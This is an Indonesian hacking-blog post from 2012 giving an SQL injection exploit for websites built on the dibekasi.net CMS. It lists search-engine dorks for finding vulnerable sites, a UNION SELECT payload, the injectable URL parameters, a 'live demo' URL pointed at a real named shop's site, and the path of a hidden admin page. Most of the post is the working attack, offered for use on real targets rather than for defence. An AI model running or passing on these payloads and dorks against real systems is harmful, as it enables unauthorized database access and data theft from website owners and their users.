Rabu, 29 Agustus 2012
Home » Exploit » Hacking » Tutorial » SQL Injection Powered by Dibekasi.net
16.39
0 komentar

SQL Injection Powered by Dibekasi.net

Dork : allinurl: page_info.php?id_brt=
vendor : dibekasi.net
=============exploit===============

+AND+1=2+UNION+SELECT+1,2,3,4,5,sql c0de,7,8,9,10,11,12,13,14,15,16--

=============Vuln In here===========

http://webtarget.com/page_info.php?id_brt=70'[your Sql c0de]&id_ktgbr=??

=============live Demos============

http://www.butikgaul.com/page_info.php?id_brt=70+AND+1=2+UNION+SELECT+1,2,3,4,5,version%28%29,7,8,9,10,11 ?,12,13,14,? ?15,16�&id_ktgbr=16

Update :

Dork:
inurl:/page_main.php?id_stdpg=
vuln : http://target.com/page_main.php?id_stdpg=

NEW Dork:
inurl:/page_member_reg.php?id_prop=
vuln : http://target.com/page_member_reg.php?id_prop=

ADMIN PAGE:
http://target.com/68651519/68530744.php
Note:admin page juga berlaku untuk dibekasi versi terbaru.
Diposting oleh di 16.39
Label: , ,
Share:

0 komentar:

Posting Komentar

Terima Kasih Telah Berkunjung
Berkomentarlah Dengan Sopan !

Langganan: Posting Komentar (Atom)